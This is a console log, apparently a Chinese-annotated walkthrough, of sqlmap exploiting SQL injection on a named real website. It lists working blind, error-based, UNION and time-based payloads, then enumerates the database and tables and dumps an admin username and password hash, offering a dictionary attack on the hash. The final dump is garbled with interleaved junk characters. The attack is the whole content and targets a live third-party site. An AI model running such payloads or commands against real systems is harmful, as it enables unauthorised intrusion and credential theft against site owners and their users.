D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* 注解:获取当前用户名称
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /*当前数据库
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
* x8 \) ~+ i0 mTable: admin
. c9 V* h/ `; q b[1 entry]+ f+ p8 c8 G9 j3 Q8 G# N2 o: R
+----------------------------------+------------+# l* u( S. M6 z3 @- |) R# K! M$ N5 U
| password | userid |; G& N/ e8 s6 ]% z! u( y8 x
+----------------------------------+------------+
# p: g) r7 Y& g( F| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |& T7 e0 N% A" I3 M9 N; t! X
+----------------------------------+------------+4 A8 \" @) G* U' B+ H2 [
shutting down at: 16:58:146 E" t3 g( b1 {8 a0 A5 Q7 p+ }/ E& C3 f
- {1 u3 Q* P. n, x
D:\Python27\sqlmap> |